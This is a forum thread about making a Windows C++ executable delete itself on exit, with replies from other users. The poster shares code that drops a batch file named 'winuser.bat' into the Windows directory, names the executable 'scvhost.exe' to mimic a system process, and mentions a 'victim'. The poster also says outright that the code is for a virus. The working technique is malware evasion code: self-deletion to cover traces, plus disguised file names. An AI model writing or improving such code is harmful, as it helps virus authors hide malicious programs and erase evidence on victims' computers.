Jump to content

Self Deletion [C++]

dark_urza
dark_urza
in Computer Discussion

Featured Replies

Posted

Is there a way for an exe to delete itself when it exits?

This is all I can think of right now but it won't work.

 

#include <windows.h>

int main()
{
   char Curpath[256];
   HMODULE HME = GetModuleHandle(NULL);
   DWORD HEM = GetModuleFileName(HME, Curpath, sizeof(Curpath));

   DeleteFile(Curpath);
   return 0;
}

 

this code may contain mistakes since i didnt review it once but i assume u get my point

Is there a way for an exe to delete itself when it exits?

This is all I can think of right now but it won't work.

 

#include <windows.h>

int main()
{
   char Curpath[256];
   HMODULE HME = GetModuleHandle(NULL);
   DWORD HEM = GetModuleFileName(HME, Curpath, sizeof(Curpath));

   DeleteFile(Curpath);
   return 0;
}

 

this code may contain mistakes since i didnt review it once but i assume u get my point

It probably won't work because it's impossible...
  • Author
you should make a .h file so all youd need to to is call DeleteSelf();

 

mine is called SelfDelete()

you should make a .h file so all youd need to to is call DeleteSelf();

 

You don't need to use a header file for every function that you call (or will call in multiple files).

 

You could just define it in a .cpp file and prototype it in any file you want to call it from.

 

It really depends on the design of your program though.

  • Author

Ok, I decide to self delete the exe using the batch way

 

:REPEAT
del "C:\fullpath.exe"
if exist "exename.exe" goto REPEAT
:SELF
del "batchname.bat"
if exist "batchname.bat" goto SELF

 

and this is the test exe

#include <stdio.h>
#include <windows.h>
#include <stdlib.h>

void Self_Delete()
{
   char Curpath[256];
   char Filename[] = "winuser.bat";
   char ExeName[] = "scvhost.exe";
   char Windows[MAX_PATH];
   
   //Get Windows directory to store temporary batch file.
   GetWindowsDirectory(Windows, sizeof(Windows));
   strcat(Windows, "\\");
   strcat(Windows, Filename);
   
   //Get Current Path
   HMODULE HME = GetModuleHandle(NULL);
   DWORD HEM = GetModuleFileName(HME, Curpath, sizeof(Curpath));
   
   //Make Batch
   FILE *Cbatch;
   Cbatch = fopen(Windows, "w");
   fprintf(Cbatch, ":REPEAT\n"
                   "del \"%s\"\n"
                   "if exist \"%s\" goto REPEAT\n"
                   ":SELF\n"
                   "del \"%s\"\n"
                   "if exist \"%s\" goto SELF\n", Curpath, ExeName, Filename, Filename);
   fclose(Cbatch);
   
   //Run Batch Immediately to Self Delete
   //If the victim can move the location after the batch has been
   //created and before the batch has finished running, he/she can
   //disable it but the chances are nearly impossible.
   
   STARTUPINFO StartupInfo;
   PROCESS_INFORMATION ProcessInfo;
   
   ZeroMemory(&StartupInfo, sizeof(StartupInfo));
   ZeroMemory(&ProcessInfo, sizeof(ProcessInfo));
   StartupInfo.cb = sizeof(STARTUPINFO);
   
   //Quickly run it to delete the executable and then itself.
   CreateProcess(NULL, Filename, NULL, NULL, NULL, NULL, NULL, NULL, &StartupInfo, &ProcessInfo);
}   
  

int main()
{
   atexit(Self_Delete);
}

 

the problem is that once the exe is executed, the exe is deleted but the batch still remains in my windows directory. And yes this is for a virus if you must know.

Because in the batch you're deleting batchname.bat, while you're creating the batch with the name winuser.bat.
  • Author
Because in the batch you're deleting batchname.bat, while you're creating the batch with the name winuser.bat.

 

no the top one is just an example anyways i got it working

 

:REPEAT

del "C:\exename.exe"

if exist "exename.exe" goto REPEAT

:SELF

del "C:\batch.bat"

if exist "C:\batch.bat" goto SELF

 

i think its like that ^

Guest
This topic is now closed to further replies.
Go to topic listing